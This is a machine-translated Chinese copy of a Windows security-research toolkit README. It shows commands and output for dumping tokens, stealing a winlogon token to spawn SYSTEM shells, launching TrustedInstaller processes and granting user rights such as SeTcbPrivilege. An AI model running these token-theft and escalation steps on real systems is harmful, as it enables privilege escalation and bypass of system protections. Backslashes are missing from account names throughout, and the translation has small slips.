    SeChangeNotifyPrivilege EnabledByDefault, Enabled
    SeCreateGlobalPrivilege EnabledByDefault, Enabled


    GROUP INFORMATION
    -----------------

    Group Name                             Attributes
    ====================================== ====================================================
    Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
    Everyone                               Mandatory, EnabledByDefault, Enabled
    BUILTINUsers                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYSERVICE                   Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYAuthenticated Users       Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYThis Organization         Mandatory, EnabledByDefault, Enabled
    NT SERVICEMSDTC                       EnabledByDefault, Enabled, Owner
    NT AUTHORITYLogonSessionId_0_515780   Mandatory, EnabledByDefault, Enabled, Owner, LogonId
    LOCAL                                  Mandatory, EnabledByDefault, Enabled


    DACL INFORMATION
    ----------------

    Account Name        Access      Flags Type
    =================== =========== ===== =============
    NT AUTHORITYSYSTEM GenericAll  None  AccessAllowed
    OWNER RIGHTS        ReadControl None  AccessAllowed
    NT SERVICEMSDTC    GenericAll  None  AccessAllowed


    SECURITY ATTRIBUTES INFORMATION
    -------------------------------

    [*] TSA://ProcUnique
        Flags : NonInheritable, Unique
        Type  : UInt64
            Value[0x00] : 0x0000000000000070
            Value[0x01] : 0x000000000007DF18


[*] Done.

要調查應用於線程的模仿令牌,請將線程ID設置為-t選項,如下所示: 

 C:Dev>.TokenDump.exe -e -T -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.

 PID  TID Session Process Name Token User          Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation
1952 2300       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation
3516 4348       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation
3516 4656       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation

[+] Got 4 thread(s).
[*] Found 1 account(s).
    [*] NT AUTHORITYSYSTEM
[*] Done.


C:Dev>.TokenDump.exe -s -p 3516 -t 4656 -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.

[Token Information for svchost.exe (PID: 3516, TID: 4656)]

Token User          : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Owner         : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Primary Group       : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Type          : Impersonation
Impersonation Level : Impersonation
Token ID            : 0x0000000000038CC4
Authentication ID   : 0x00000000000003E7
Original ID         : 0x00000000000003E7
Modified ID         : 0x000000000002CE61
Integrity Level     : System
Protection Level    : N/A
Session ID          : 0
Elevation Type      : Default
Mandatory Policy    : NoWriteUp, NewProcessMin
Elevated            : True
AppContainer        : False
TokenFlags          : IsFiltered, NotLow, EnforceRedirectionTrust
Has Linked Token    : False
Token Source        : N/A
Token Source ID     : N/A


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                State
    ============================= =========================
    SeAssignPrimaryTokenPrivilege Disabled
    SeTcbPrivilege                EnabledByDefault, Enabled
    SeSecurityPrivilege           Disabled
    SeSystemProfilePrivilege      EnabledByDefault, Enabled
    SeDebugPrivilege              EnabledByDefault, Enabled
    SeChangeNotifyPrivilege       EnabledByDefault, Enabled
    SeImpersonatePrivilege        EnabledByDefault, Enabled
    SeCreateGlobalPrivilege       EnabledByDefault, Enabled


    GROUP INFORMATION
    -----------------

    Group Name                             Attributes
    ====================================== ====================================================
    Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
    Everyone                               Mandatory, EnabledByDefault, Enabled
    BUILTINUsers                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYSERVICE                   Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYAuthenticated Users       Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYThis Organization         Mandatory, EnabledByDefault, Enabled
    NT SERVICEDiagTrack                   EnabledByDefault, Enabled, Owner
    NT AUTHORITYLogonSessionId_0_180260   Mandatory, EnabledByDefault, Enabled, Owner, LogonId
    LOCAL                                  Mandatory, EnabledByDefault, Enabled
    BUILTINAdministrators                 EnabledByDefault, Enabled, Owner


    DACL INFORMATION
    ----------------

    Account Name         Access      Flags Type
    ==================== =========== ===== =============
    NT AUTHORITYSYSTEM  GenericAll  None  AccessAllowed
    OWNER RIGHTS         ReadControl None  AccessAllowed
    NT SERVICEDiagTrack GenericAll  None  AccessAllowed


    SECURITY ATTRIBUTES INFORMATION
    -------------------------------

    [*] TSA://ProcUnique
        Flags : NonInheritable, Unique
        Type  : UInt64
            Value[0x00] : 0x0000000000000047
            Value[0x01] : 0x000000000002C0FA


[*] Done.

Tokenassignor

回到頂部

專案

該工具是學習如何分配主要令牌: 

 PS C:Dev> .TokenAssignor.exe

TokenAssignor - Tool to execute token assigned process.

Usage: TokenAssignor.exe [Options]

        -h, --help    : Displays this help message.
        -c, --command : Specifies a command to execute. Default is cmd.exe.
        -m, --method  : Specifies a method ID (0 - 3).
        -p, --pid     : Specifies a source PID for token stealing.

[!] -m option is required.

該工具試圖從指定的過程中竊取令牌並執行令牌分配的過程。大多數方法都需要管理特權。要使用CreateProcessAsUser API執行令牌分配的過程,請將-m選項設置為0

 PS C:Dev> Get-Process winlogon

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    270      13     2452      10108       0.33    688   1 winlogon

PS C:Dev> whoami /user

USER INFORMATION
----------------

User Name            SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 0

[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x68).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).
[+] Impersonation as winlogon.exe is successful.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 9552).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:Dev>whoami /user

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authoritysystem S-1-5-18

當將-m選項設置為1 ,此工具將嘗試創建懸浮過程,並將主令牌更新為被盜的令牌。由於內核限制,此方法不能用於更改會話ID。內核強制令牌的會話ID與_EPROCESS的會話ID匹配: 

 PS C:Dev> whoami /user

USER INFORMATION
----------------

User Name            SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 1

[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C8).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).
[+] Impersonation as winlogon.exe is successful.
[+] Suspended "C:Windowssystem32cmd.exe" is executed successfully (PID = 9968).
[*] Current user of the suspended process is DESKTOP-5OHMOBJuser (SID: S-1-5-21-1955100404-698441589-1496171011-1001)
[+] Primary token for the suspended process is updated successfully.
[*] Current user of the suspended process is NT AUTHORITYSYSTEM (SID: S-1-5-18)
[*] Resuming the suspended process.
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:Dev>whoami /user

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authoritysystem S-1-5-18

如果設置-m選項設置為2 ,則使用輔助登錄服務創建一個新的令牌分配的過程: 

 PS C:Dev> whoami /user

USER INFORMATION
----------------

User Name            SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 2

[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C4).
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 5832).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).

PS C:Dev>

Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:Dev>whoami /user

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authoritysystem S-1-5-18

如果設置-m選項設置為3 ,則使用PPID欺騙方法創建一個新的令牌分配過程: 

 PS C:Dev> whoami /user

USER INFORMATION
----------------

User Name            SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 3

[+] SeDebugPrivilege is enabled successfully.
[+] Got a handle from PID 688 (Handle = 0x2C4).
[+] Thread attribute is built successfully.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 4852).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).

PS C:Dev>


Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:Dev>whoami /user

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authoritysystem S-1-5-18

TrustExec

回到頂部

專案

此工具是作為NT SERVICETrustedInstaller組帳戶執行過程。原始POC是Grzegorz Tworek的TrustedInstallerCmd2.c。我將其移植到C#並將其作為工具進行了重建。大多數行動都需要行政特權( SeDebugPrivilegeSeImpersonatePrivilege和高強度級別): 

 PS C:Dev> .TrustExec.exe

TrustExec - Tool to create TrustedInstaller process.

Usage: TrustExec.exe [Options]

        -h, --help        : Displays this help message.
        -l, --lookup      : Flag to lookup account name or SID.
        -n, --new-console : Flag to create new console. Use with -x flag.
        -x, --exec        : Flag to execute command.
        -a, --account     : Specifies account name to lookup.
        -c, --command     : Specifies command to execute. Default is cmd.exe.
        -e, --extra       : Specifies command to execute. Default is cmd.exe.
        -m, --method      : Specifies method ID. Default is 0 (NtCreateToken method).
        -s, --sid         : Specifies SID to lookup.

Available Method IDs:

        + 0 - Leverages NtCreateToken syscall.
        + 1 - Leverages virtual logon.
        + 2 - Leverages service logon.
        + 3 - Leverages S4U logon.
        + 4 - Leverages TrustedInstaller service.

對於此模塊,插入了2種技術。我們可以指定具有-m選項的方法。 -m選項的值可以是04整數。例如,如果將-m選項設置為0 ,則此工具嘗試使用NtCreateToken獲得TrustedInstaller令牌: 

 PS C:Dev> .TrustExec.exe -m 0 -x -c powershell

[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0xE8).
[+] Got a token assigned process (PID: 2832).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:Dev> whoami /user

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authoritysystem S-1-5-18
PS C:Dev> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeSyncAgentPrivilege                      Synchronize directory service data                                 Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:Dev> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes
====================================== ================ ============================================================== ==================================================
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE                   Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner
BUILTINUsers                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label            S-1-16-16384

如果要使用新控制台創建進程,請設置-n標誌如下: 

 PS C:Dev> .TrustExec.exe -m 1 -x -c powershell -n

[*] Virtual logon method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] SeTcbPrivilege is enabled successfully for current thread.
[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).
[+] A virtual account VirtualDomainVirtualAdmin is created successfully (SID: S-1-5-110-500).
[+] Got a virtual logon token (Handle = 0xEC).
[+] Got a token assigned process (PID: 23836).
[+] VirtualDomain domain is removed successfully.

除了TrustedInstaller服務方法以外的每種方法( -m選項ID是4 )接受具有-e選項的額外組SID。 -e選項的值格式必須是SDDL SID字符串。對於SID字符串分離器,您可以使用逗號如下: 

 PS C:Dev> .TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551

[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0x30C).
[+] Got a token assigned process (PID: 17500).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:Dev> whoami /user

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                             Attributes
====================================== ================ =============================================================== ==================================================
Everyone                               Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE                   Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users       Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
BUILTINBackup Operators               Alias            S-1-5-32-551                                                    Enabled by default, Enabled group
BUILTINAdministrators                 Alias            S-1-5-32-544                                                    Enabled by default, Enabled group, Group owner
BUILTINUsers                          Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464  Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label            S-1-16-16384                                                    
NT SERVICEWinDefend                   Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Enabled by default, Enabled group

要解決帳戶SID,設置-l標誌和-a選項,帶有帳戶名稱如下: 

 PS C:Dev> .TrustExec.exe -l -a "nt servicewindefend"

[*] Account Name : NT SERVICEWinDefend
[*] Account SID  : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup

PS C:Dev> .TrustExec.exe -l -a users

[*] Account Name : BUILTINUsers
[*] Account SID  : S-1-5-32-545
[*] Account Type : Alias

Userrightsutil

回到頂部

專案

該工具是在沒有secpol.msc的情況下管理用戶。除lookup以外的命令需要管理員特權: 

 C:dev>UserRightsUtil.exe

UserRightsUtil - User rights management utility.

Usage: UserRightsUtil.exe [Options]

        -h, --help   : Displays this help message.
        -m, --module : Specifies module name.

Available Modules:

        + enum   - Enumerate user rights for specific account.
        + find   - Find accounts have a specific user right.
        + lookup - Lookup account's SID.
        + manage - Grant or revoke user rights.

[*] To see help for each modules, specify "-m <Module> -h" as arguments.

[!] -m option is required.

枚舉模塊

要列舉特定帳戶的用戶權利, enum使用-ud Opitons或-s選項如下: 

 C:dev>UserRightsUtil.exe -m enum -d contoso -u jeff

[>] Trying to enumerate user rights.
    |-> Username : CONTOSOjeff
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
    |-> SeChangeNotifyPrivilege
    |-> SeIncreaseWorkingSetPrivilege
    |-> SeShutdownPrivilege
    |-> SeUndockPrivilege
    |-> SeTimeZonePrivilege
    |-> SeInteractiveLogonRight
    |-> SeNetworkLogonRight
[*] Done.


C:dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105

[>] Trying to enumerate user rights.
    |-> Username : CONTOSOjeff
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
    |-> SeChangeNotifyPrivilege
    |-> SeIncreaseWorkingSetPrivilege
    |-> SeShutdownPrivilege
    |-> SeUndockPrivilege
    |-> SeTimeZonePrivilege
    |-> SeInteractiveLogonRight
    |-> SeNetworkLogonRight
[*] Done.

如果您沒有使用-d選項指定域名,請使用本地計算機名稱作為域名: 

 C:dev>hostname
CL01

C:dev>UserRightsUtil.exe -m enum -u guest

[>] Trying to enumerate user rights.
    |-> Username : CL01Guest
    |-> SID      : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
    |-> SeInteractiveLogonRight
    |-> SeDenyInteractiveLogonRight
    |-> SeDenyNetworkLogonRight
[*] Done.

查找模塊

此命令是找到具有特定權利的用戶。例如,如果您想查找用戶具有SeDebugPrivilege ,請執行如下: 

 C:dev>UserRightsUtil.exe -m find -r debug

[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
    |-> BUILTINAdministrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.

要列出-r選項的可用值,請使用-l選項: 

 C:dev>UserRightsUtil.exe -m find -l

Available values for --right option:
        + TrustedCredManAccess           : Specfies SeTrustedCredManAccessPrivilege.
        + NetworkLogon                   : Specfies SeNetworkLogonRight.
        + Tcb                            : Specfies SeTcbPrivilege.
        + MachineAccount                 : Specfies SeMachineAccountPrivilege.
        + IncreaseQuota                  : Specfies SeIncreaseQuotaPrivilege.
        + InteractiveLogon               : Specfies SeInteractiveLogonRight.
        + RemoteInteractiveLogon         : Specfies SeRemoteInteractiveLogonRight.
        + Backup                         : Specfies SeBackupPrivilege.

--snip--

查找模塊

此命令是查找帳戶SID如下: 

 C:dev>UserRightsUtil.exe -m lookup -d contoso -u david

[*] Result:
    |-> Account Name : CONTOSOdavid
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-1104
    |-> Account Type : SidTypeUser


C:dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500

[*] Result:
    |-> Account Name : CONTOSOAdministrator
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-500
    |-> Account Type : SidTypeUser


C:dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"

[*] Result:
    |-> Account Name : CONTOSODomain Admins
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-512
    |-> Account Type : SidTypeGroup

如果您沒有使用-d選項指定域名,請使用本地計算機名稱作為域名: 

 C:dev>hostname
CL01

C:dev>UserRightsUtil.exe -m lookup -u admin

[*] Result:
    |-> Account Name : CL01admin
    |-> SID          : S-1-5-21-2659926013-4203293582-4033841475-500
    |-> Account Type : SidTypeUser

管理模塊

此命令是授予或撤銷特定用戶帳戶的用戶權利。要授予用戶權利,請指定用戶權利作為-g選項的值: 

 C:dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.


C:dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator

[>] Target account information:
    |-> Username : CONTOSOAdministrator
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.

C:dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
    |-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.

要撤銷用戶,請將用戶權利指定為-r選項的值: 

 C:dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
    |-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.


C:dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator

[>] Target account information:
    |-> Username : CONTOSOAdministrator
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.

C:de>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.

要列出-g-r選項的可用值,請使用-l選項: 

 C:dev>UserRightsUtil.exe -m manage -l

Available values for --grant and --revoke options:
        + TrustedCredManAccess           : Specfies SeTrustedCredManAccessPrivilege.
        + NetworkLogon                   : Specfies SeNetworkLogonRight.
        + Tcb                            : Specfies SeTcbPrivilege.
        + MachineAccount                 : Specfies SeMachineAccountPrivilege.
        + IncreaseQuota                  : Specfies SeIncreaseQuotaPrivilege.
        + InteractiveLogon               : Specfies SeInteractiveLogonRight.
        + RemoteInteractiveLogon         : Specfies SeRemoteInteractiveLogonRight.
        + Backup                         : Specfies SeBackupPrivilege.

--snip--

參考

回到頂部

  • Grzegorz Tworek的Priv2Admin和Psbits
  • Bryan Alexander和Steve Breen濫用LPE的代幣特權
  • whoami /priv by andrea pierini
  • Ashfaq Ansari的Hacksys極限易受傷害的驅動程序

致謝

回到頂部

感謝您對WINDBG擴展程序編程的建議:

  • Pavel Yosifovich(@zodiacon)

感謝您的顯著研究:

  • grzegorz tworek(@0gtweet)
  • 布萊恩·亞歷山大(@dronesec)
  • 史蒂夫·布雷恩(@breenmachine)
  • Andrea Pierini(@decoder_it)

感謝您的示例內核驅動程序發布:

  • ashfaq ansari(@hacksysteam)
展開
附加信息
相關應用
爲您推薦
相關資訊 全部